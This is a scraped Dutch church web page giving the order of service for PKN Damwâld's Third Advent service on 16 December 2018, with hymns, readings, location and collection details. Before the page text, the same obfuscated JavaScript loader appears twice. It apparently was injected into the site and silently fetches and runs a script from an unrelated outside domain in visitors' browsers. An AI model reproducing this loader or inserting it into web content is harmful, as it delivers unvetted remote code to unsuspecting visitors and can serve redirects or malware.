;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 16 december 2018 9:30 uur - PKN Damwâld
zondag 16 december 2018
09:30 uur
Derde Advent / KingKids kerstproject 'Lichtdragers van God'

Kerkdienst zondag 16 december 2018 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Mededeling:Derde Advent / KingKids kerstproject 'Lichtdragers van God'
Liturgie
Lied voor de dienst Ps. 150 : 1 en 2
Welkom
Aanvangslied Gez.125: 1 en 4
Stil gebed, Votum en groet
King kids bijdrage over kerstproject
We zingen: Projectlied
Wetslezing .
We zingen: Gez.130: 1 en 4
Gebed
We lezen: Lucas 1: 39 - 56
We zingen: Ps. 62: 1 en 5
Preek .
We zingen: ELB 377: 1,2 en 3
Dankzegging en voorbede
Collecte
Slotlied Ps.89:1 en 7
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Rudolphstichting

De Rudolphstichting onderhoudt gezinshuizen en zorgwoningen in Jeugddorp De Glind. Daarnaast ontwikkelt zij projecten die de zorg voor uithuis geplaatste kinderen en jongeren verbeteren en vernieuwen. Herstel van het normale leven is hierbij uitgangspunt. Zodat deze jongeren alle kans krijgen om zich te richten op de toekomst.

Tweede collecte: Kerk
Uitganscollecte: Kerk